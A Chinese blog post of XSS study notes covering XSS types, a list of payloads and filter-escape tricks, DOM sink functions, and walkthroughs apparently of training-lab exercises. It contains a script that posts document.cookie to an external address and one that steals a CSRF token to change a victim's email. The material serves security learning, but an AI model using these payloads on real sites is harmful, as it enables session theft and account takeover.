XSS原理+DOMXSS实战

最新推荐文章于 2024-04-19 21:35:55 发布
最新推荐文章于 2024-04-19 21:35:55 发布
阅读量1.3k 收藏 8
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46128614/article/details/105033885
版权

1. XSS成因

用户在客户端输入一个内容,服务端收到这个内容,并把它嵌入网页再返回给用户,这是一个常见的功能。如果用户输入的这个内容是一段精心构造的js代码,服务端恰好没有过滤,那返回的js就会被浏览器执行。

2. XSS分类

2.1 反射型
	常见把js构造在URL中,然后引导其他人点击这个恶意URL,造成反射型XSS
2.2 存储型
	把恶意的js发送到服务端并存储,以后其他用户每次浏览页面,都会触发XSS
2.3 DOM型
	DOM型XSS是特殊的XSS,页面中有很多元素,浏览器会为这些元素创建对应的文档对象,每个对象都有属性和方法。通过构造js编辑文档对象,修改页面,获取DOM中的数据

3. XSSpayload

3.1 常用payload
	<script>alert(/xss/);</script>
	<BODY ONLOAD=alert('XSS')>
	<img src=x onerror=alert(1)>
	<svg onload=alert(1)>
	<a href = javasript:alert(1)>
3.2 常用凑js思路
	a. </script>闭合前一个js
	b. 跳出前一个js
	'-alert(document.domain)-'
	';alert(document.domain)//
	c. 绕过转译字符
	';alert(document.domain)// 会被转译为 \';alert(document.domain)//
	所以我们输入
	\';alert(document.domain)//会被转译为\\';alert(document.domain)//
	js又可以成功执行了
	d. 用HTML解析绕过单引号
	&apos; 代表单引号
	&apos;-alert(1)-&apos; 等于'-alert(document.domain)-'
	e. 嵌入模板跳出双引号
	${alert(1)} 是一个嵌入的模板
	前后闭合双引号
	"${alert(1)}"
3.3 偷cookie的js
	<script>
	fetch('https:// ', {
	method: 'POST',
	mode: 'no-cors',
	body:document.cookie
	});
	</script>
3.4 配合csrf偷tokens

在这里插入图片描述
在这里插入图片描述

	这样一个修改邮箱的地址框,背后带有token防止csrf
	但是配合XSS 就可以偷取token,修改邮箱
	<script>
	var req = new XMLHttpRequest(); 
	req.onload = handleResponse; 
	req.open('get','/email',true); 
	req.send();
	function handleResponse() {
	    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
	    var changeReq = new XMLHttpRequest(); 
	    changeReq.open('post', '/email/change', true);
	    changeReq.send('csrf='+token+'&email=test@test.com')
	};
	</script>
	发送一个请求 去到email页面 偷取token
	发送第二个请求 携带token,修改邮箱
3.5 查找反射XSS小技巧
	用Repeater模块发送payload,然后在回复里查找这个payload,如果解析了,则存在XSS

4. 可能导致DOMXSS的函数

document.write()
document.writeln()
document.domain
someDOMElement.innerHTML
someDOMElement.outerHTML
someDOMElement.insertAdjacentHTML
someDOMElement.onevent
jQuery functions:
add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()

5. 实战DOMXSS

a. 实战1

在这里插入图片描述
输入随机字符,然后做检查
在这里插入图片描述
发现了qqq在img内
我们拼接
“><svg onload=alert(1)>
成功触发

b. 实战2

在这里插入图片描述
有一个选择查询框
点击查询,bp截包查看
在这里插入图片描述
发现post包里有两个参数
右击查看元素
在这里插入图片描述
发现js会用get方法读取storeId,然后document.write写进页面里,拼接他的内容
"></select><img%20src=1%20onerror=alert(10)>
就能构成
<select name=""></select><img%20src=1%20onerror=alert(10)>
完成XSS

c. 实战3

在这里插入图片描述
先搜索qqqq
在这里插入图片描述
发现搜索内容直接嵌入到了HTML标签里
可以直接嵌入img 然后调用οnerrοr=alert()触发

d. 实战4

发现url中含有参数
在这里插入图片描述
在其中一个Back标签,跳转的href参数是从用户端的URL传进来的
在这里插入图片描述
构造url
https://ac121f241fb558428099334d007e003d.web-security-academy.net/feedback?returnPath=javascript:alert(1)
然后点击Back,完成了XSS

e. 实战5

AngularJS 在检查元素中发现了ng-app 确认js library
然后在输入框 直接两个花括号执行
{{$on.constructor('alert(1)')()}}

「已注销」
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA靶场笔记之xssDOM原理
Alonegrief的博客
11-30 2422
原理Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其中web的html代码会被执行,从而达到恶意的特殊目的 Xss漏洞分为三类: 一、 反射xss:非持久化,攻击者事先制作好攻击连接,需要欺骗用户自己去点击连接才能触发xss代码(服务器中没有这样的页面和内容),一般容易出现搜索页面 二、 存储xss:持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将存储到服务器中,每当有用户访问该页面
xssDOM
xu_1234567的博客
11-04 6471
1.DOMxss原理 dom就是一个树状的模,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射的,也有可能是存储的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)分析完dom-xss之后,再说说存储xss,其实也很好理解,存储xss
XSS漏洞---类+实战案例+防止
最新发布
zhoutong2323的博客
04-19 1137
XSS漏洞(Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时,攻击者就可以利用该漏洞来执行任意的代码,例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。
xss原理及利用
MAPLE102424的博客
05-12 1357
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。当别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
网络安全之从原理看懂XSS
qq_44005305的博客
10-12 167
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆故将跨站脚本攻击缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的,XSS攻击针对的是用户层面的攻击;XSS分为:存储,反射DOMXSS
XSS漏洞原理详解丨小白WEB安全入门
jennycisp的博客
06-27 1808
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤。
JQuery Dom XSS探测.html
05-15
可以直接测试网站里面的JQuery本地弹窗xss,属于渗透测试项一部分,此项目在xss中也属于高危,只需要替换里面的带测试链接即可。
XSS漏洞 DOM测试 payload代码
02-26
XSS漏洞 DOM测试 payload代码 这是测试跨脚本攻击是否有DOMXSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
XSS高级实战教程
09-28
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的...
dom_xss挖掘与攻击面延伸
04-17
isc2018 dom-xss议题 dom-xss dom-xss dom-xss dom-xss
SpringBoot +esapi 实现防止xss攻击 实战代码
11-25
SpringBoot +esapi springSecurity 过滤器链集成 实现防止xss攻击 实战代码
DOM XSS利用 原理
zgy956645239的博客
03-30 448
原理就是 通过复选框的接口 篡改参数来构造恶意请求 比如复选框原始请求是这个 http://www.baid.com?id=TRUE 但是黑客构造后 http://www.baid.com?id=TRUE<script>getPassword</script> 然后黑客通过某种钓鱼的方式 发给受害者, 受害者点击后,浏览器 就会通过$("head").append(XXX) 方法解析参数,然后执行参数中的<script>getPassword</script...
domxss ---(waf绕过)
m0_63306943的博客
04-05 1186
DOM 是文档对象化模(Document Object Model)的简称。DOM Tree 是指通过 DOM 将 HTML 页面进行解析,并生成的 HTML tree 树状结构和对应访问方法。借助DOM Tree,我们能直接而且简易的操作HTML页面上的每个标记内容DOM技术被Internet Explorer 5.0及以上版本的浏览器所支持,它采取一种非常直观且一致的方式将HTML文档进行模化处理,并借此提供访问、导航和操作页面的简易编程接口。
【Web安全】跨站脚本攻击XSS
RexHa的博客
09-04 825
跨站脚本攻击(XSS),通常指黑客通过HTML注入在网页中插入了恶意脚本,在用户浏览网页时,控制用户浏览器的一种攻击。XSS可以分为以下几类:1、反射XSS又叫非持久XSS,黑客需要诱导用户“点击”一个恶意链接,才能攻击成功。2、存储XSS又叫持久XSS,恶意代码存储在服务器中,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行。从效果上来说也属于反射XSS,是通过修改页面的DOM节点形成的XSS
3-4DomXSS详解以及演示
山兔的博客
04-21 3461
学习DOMXSS前,先搞清楚什么是DOM 通过 JavaScript,可以重构整个 HTML 文档。您可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript 就需要获得对HTML 文档中所有元素进行访问的入口。这个入口,连同对 HTML 元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模来获得的(DOM)。 所以,你可以把DOM理解为一个可以访问HTML的标准编程接口。 举个栗子来理解一下DOM <html><head> <sc
利用DOM XSS
qq_71164192的博客
06-22 272
DOM XSS是一种跨站脚本攻击,利用浏览器的DOM解析HTML文档时的漏洞,注入恶意JavaScript代码,从而达到窃取用户敏感信息、盗取用户账号等目的。本文将介绍DOM XSS攻击的原理和危害,并介绍一些防范措施。
漏洞篇之DOMxss
weixin_46446401的博客
03-03 8203
介绍了domxss原理和特点,并讲解了pikachu这个靶场的例子
CTFhub XSS技能树DOM
07-29
XSS (Cross-Site Scripting) 是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来实施攻击。DOM (Document Object Model) 是一种用于表示和操作网页文档的编程接口。 在 CTFhub 中,XSS 技能树涵盖了多个与 XSS 相关的知识点和攻击场景。以下是一些可能包含在 XSS 技能树中的主题: 1. XSS 基础知识:深入理解 XSS原理、类和危害。 2. 攻击载体:了解常见的 XSS 攻击载体,如 HTML、JavaScript、CSS、URL 参数等。 3. 攻击向量:学习常见的 XSS 攻击向量,如存储、反射DOM XSS。 4. 编码技巧:掌握对恶意脚本进行编码和绕过防护机制的技巧。 5. 攻击场景:了解在不同的应用场景下如何利用 XSS 漏洞进行攻击,如登录表单、搜索功能等。 6. 防御措施:学习如何预防和修复 XSS 漏洞,包括输入验证、输出编码、CSP (Content Security Policy) 等。 这只是一个简单的示例,实际的 XSS 技能树可能会更加详细和全面。在学习 XSS 技能树时,你可以通过阅读相关的文档、参与挑战和实践来提高自己的技能。记住,安全意识和代码审计能力也是成为一名优秀的安全工程师的重要因素。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值